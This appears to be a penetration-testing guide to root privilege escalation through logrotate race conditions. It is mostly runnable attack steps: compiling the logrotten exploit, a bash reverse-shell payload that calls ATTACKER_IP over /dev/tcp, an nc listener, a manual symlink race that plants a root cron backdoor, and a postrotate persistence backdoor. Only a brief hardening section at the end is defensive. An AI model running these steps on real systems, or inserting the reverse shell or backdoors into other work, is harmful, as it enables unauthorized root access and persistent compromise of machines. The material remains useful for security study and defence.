Logrotate Exploitation

Guide to exploiting logrotate misconfigurations for privilege escalation using race conditions and the logrotten exploit.

Introduction

Logrotate is a system utility that manages log file rotation, compression, and removal. It runs periodically via cron with root privileges to handle log files across the system. Certain versions of logrotate contain race condition vulnerabilities that can be exploited for privilege escalation.

Requirements

To exploit logrotate, you need:

Write permissions on a log file that logrotate manages
Logrotate running as root (default behavior)
Vulnerable version: 3.8.6, 3.11.0, 3.15.0, or 3.18.0

Understanding Logrotate

Configuration

Global configuration is in /etc/logrotate.conf:

cat /etc/logrotate.conf

# rotate log files weekly
weekly

# use the adm group
su root adm

# keep 4 weeks worth of backlogs
rotate 4

# create new log files after rotating
create

# include per-application configs
include /etc/logrotate.d

Application Configs

Per-application configs in /etc/logrotate.d/:

ls /etc/logrotate.d/
apache2  apt  dpkg  mysql  rsyslog  samba

cat /etc/logrotate.d/dpkg
/var/log/dpkg.log {
    monthly
    rotate 12
    compress
    delaycompress
    missingok
    notifempty
    create 644 root root
}

Status File

Logrotate tracks rotation dates in a status file:

cat /var/lib/logrotate.status

"/var/log/samba/log.smbd" 2024-8-3
"/var/log/mysql/mysql.log" 2024-8-3

Vulnerability Analysis

The Race Condition

Logrotate creates new log files with a predictable sequence:

Rename existing log file
Create new log file
Set permissions on new file

Between steps 2 and 3, there's a window where an attacker can replace the new file with a symlink, causing logrotate to write to an arbitrary location.

Vulnerable Versions

3.8.6
3.11.0
3.15.0
3.18.0

Check version:

logrotate --version

git clone https://github.com/whotwagner/logrotten.git
cd logrotten
gcc logrotten.c -o logrotten

Create Payload

# Reverse shell payload
cat > payload << 'EOF'
bash -i >& /dev/tcp/ATTACKER_IP/9001 0>&1
EOF

Determine Logrotate Option

grep "create\|compress" /etc/logrotate.conf | grep -v "#"

If create is used: use default logrotten
If compress is used: use logrotten -c

Start Listener

nc -nlvp 9001

Execute Exploit

# For 'create' option (most common)
./logrotten -p ./payload /tmp/target.log

# For 'compress' option
./logrotten -c -p ./payload /tmp/target.log

Manual Exploitation

If you have write access to a log file and the directory:

# Create symlink race condition
while true; do
    # Wait for rotation
    if [ ! -f /var/log/app/app.log ]; then
        ln -sf /etc/cron.d/backdoor /var/log/app/app.log
        break
    fi
    sleep 0.1
done

# Prepare cron backdoor content
echo "* * * * * root /tmp/shell.sh" > /tmp/cron_payload

Identifying Writable Logs

# Find writable log files
find /var/log -writable -type f 2>/dev/null

# Check log directories
find /var/log -writable -type d 2>/dev/null

# Find logs managed by logrotate
cat /etc/logrotate.d/* | grep "^/" | cut -d' ' -f1

Forcing Log Rotation

Normally logrotate runs via cron (daily). To force rotation:

# Force rotation (requires root or sudo)
sudo logrotate -f /etc/logrotate.conf

# Or modify status file to backdate
# This makes logrotate think rotation is due

Persistence via Logrotate

If you have write access to /etc/logrotate.d/, you can create persistent backdoors:

cat > /etc/logrotate.d/backdoor << 'EOF'
/var/log/backdoor.log {
    daily
    rotate 1
    postrotate
        /tmp/shell.sh
    endscript
}
EOF

The postrotate script runs as root after rotation.

Detection and Defense

Hardening

# Ensure proper permissions on logrotate configs
chmod 644 /etc/logrotate.conf
chmod 644 /etc/logrotate.d/*

# Restrict write access to log directories
chmod 750 /var/log

# Update logrotate to patched version
apt update && apt upgrade logrotate